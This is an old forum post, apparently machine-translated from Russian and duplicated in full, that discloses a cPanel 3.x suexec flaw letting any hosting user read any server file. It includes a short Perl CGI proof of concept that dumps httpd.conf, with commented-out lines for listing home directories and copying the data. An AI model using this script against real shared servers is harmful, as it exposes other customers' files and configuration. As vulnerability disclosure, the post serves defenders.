IDRU
07-05-2001, 11:56 AM
ATTENTION!
CLOSELY(ATTENTIVELY) READ THIS MESSAGE!
YESTERDAY OUR PROGRAMMERS HAVE DETECTED In cpanel 3.x the big error in the system of safety!
===
Any user who is registered on the server on which it is installed cpanel 3.x can to view and copy any file in any folder on this server. :bawling:
==
The Example:
Having written such script, and having made active it(him), the user can view the information contained for the provider on the server in the file /usr/local/apache/conf/httpd.conf:
#!/usr/local/bin/perl
###########################Загрузка модулей####################################
use strict; # Никогда не забывать, избавляет от многих ошибок
use CGI qw(:standard); # Зачем изобретать велосипед?
use CGI::Carp qw(fatalsToBrowser); # Все ошибки в броузер
my $cgi = new CGI;
print $cgi->header('text/html');
$/ = undef;
open(ff, "< /usr/local/apache/conf/httpd.conf") or die "$!";
my $var = <ff>;
close(ff);
print $var;
#opendir(DIR, "/home") || die "can't opendir: $!";
#my @dots = grep {-d "/home/$_" } readdir(DIR);
#closedir DIR;
#print "$_\n" for @dots;
#open(FILE, "> ../****.txt") or die "$!";
#print FILE $var;
#close(FILE);
Having written such simple script (him have written for 1 minute!) such big error in the system of safety is detected.
The error contains in suexec, she(it) gives right Nobody/nobody for any user.
Cpanel it is necessary for developers to find and correct an error immediately.
Excuse for bad English, I while very badly know it(him).
CLOSELY(ATTENTIVELY) READ THIS MESSAGE!
YESTERDAY OUR PROGRAMMERS HAVE DETECTED In cpanel 3.x the big error in the system of safety!
===
Any user who is registered on the server on which it is installed cpanel 3.x can to view and copy any file in any folder on this server. :bawling:
==
The Example:
Having written such script, and having made active it(him), the user can view the information contained for the provider on the server in the file /usr/local/apache/conf/httpd.conf:
#!/usr/local/bin/perl
###########################Загрузка модулей####################################
use strict; # Никогда не забывать, избавляет от многих ошибок
use CGI qw(:standard); # Зачем изобретать велосипед?
use CGI::Carp qw(fatalsToBrowser); # Все ошибки в броузер
my $cgi = new CGI;
print $cgi->header('text/html');
$/ = undef;
open(ff, "< /usr/local/apache/conf/httpd.conf") or die "$!";
my $var = <ff>;
close(ff);
print $var;
#opendir(DIR, "/home") || die "can't opendir: $!";
#my @dots = grep {-d "/home/$_" } readdir(DIR);
#closedir DIR;
#print "$_\n" for @dots;
#open(FILE, "> ../****.txt") or die "$!";
#print FILE $var;
#close(FILE);
Having written such simple script (him have written for 1 minute!) such big error in the system of safety is detected.
The error contains in suexec, she(it) gives right Nobody/nobody for any user.
Cpanel it is necessary for developers to find and correct an error immediately.
Excuse for bad English, I while very badly know it(him).